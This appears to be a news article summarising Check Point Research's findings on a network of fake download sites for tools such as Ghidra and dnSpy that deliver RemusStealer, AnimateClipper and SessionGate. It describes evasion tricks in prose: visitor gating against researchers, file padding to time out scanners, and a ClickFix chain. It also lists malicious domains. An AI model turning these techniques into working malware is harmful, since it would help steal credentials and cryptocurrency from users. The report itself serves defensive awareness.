A network of fake websites is trapping unsuspecting users by claiming to be official download pages for free tools like Ghidra, dnSpy, ILSpy, and CrystalDiskMark. Discovered by Check Point Research, this operation uses highly realistic portals to trick visitors into downloading malware instead of legitimate software.
How the Scam Works
Usually, when open-source projects are searched on Google, users trust the first link that appears. In this campaign, hackers exploit exactly this habit. Researchers explain in the blog post that they have developed 100+ clone websites that mimic real portals, even preserving authentic GitHub links when users hover over download buttons.
But clicking the button triggers CloudFront-hosted JavaScript, which redirects users to a Traffic Distribution System (TDS). It employs strict gating, analysing the visitor’s country, browser fingerprint, and VPN usage.
If it suspects a security investigator, a reproducibility trap triggers, delivering the real software or a benign program like Opera. Regular users, however, are routed through gates like trkscope.xyz and file-enter-web.com directly to malware.
Severe Threats Discovered
The network has been spreading since January 2026, with some infrastructure surfacing in July 2025, and the following threats were identified:
RemusStealer:
Advertised as ‘Remus,’ a Malware-as-a-Service (MaaS) subscription product, on a Russian underground forum on 12 February 2026 by a user named RemusStealer, this $250 to $500 infostealer arrives in a password-protected ZIP. The extracted Go-based executable is artificially padded with zeros to an 850 MB on-disk size to cause antivirus scanners to time out.
When executed, RemusStealer raids over 20 browsers for stealing credentials, cookies, and master keys. This data is stolen via Windows DPAPI (CryptUnprotectData) using low-level system calls.
Immediately after browsers, it turns to targeting extensions like 1Password, Bitwarden, MetaMask, and Trust Wallet, exfiltrating screenshots and clipboard data (CF_UNICODETEXT) to C2 domains like buccstanor.pics and baxe.pics.
AnimateClipper:
Using the ClickFix technique, a fake Cloudflare verification screen tricks users into running a remote script via mshta.exe. This kicks off a complex chain involving PowerShell, RC4 decryption, a Python environment, and a hidden loader inside a deceptive file (node_modules.asar) that runs shellcode via ntdll!LdrCallEnclave.
The final payload replaces cryptocurrency addresses in the system clipboard with the hacker’s own. These wallets have received funds on the BNB Smart Chain Testnet since 12 July 2025.
SessionGate:
This unknown multi-stage loader disguises itself as a 7-Zip SFX installer. The 20 MB archive holds a 15 MB decoy and 5 MB of bloated code filled with opaque predicates designed to break IDA’s decompiler.
SessionGate hides its indicator list using Adler-32 hashes, checking for security processes like npcap and sysmondrv or Windows Defender’s PUAProtection setting. It contacts appfreshstart.com using the NSIS_InetLoad User-Agent, requiring a one-time key from yourfastcrc.com to decrypt subsequent payloads.
A Global Issue
VirusTotal data reveals the operation’s massive reach as individual samples were submitted between 2,000 and 5,000 times, with heavy activity detected globally. Most notable activity was in the UK, Germany, France, Poland, Brazil, Russia, and Turkey.
Check Point researchers are urging users to double-check web addresses carefully before clicking download buttons, as a professional appearance cannot guarantee safety anymore.
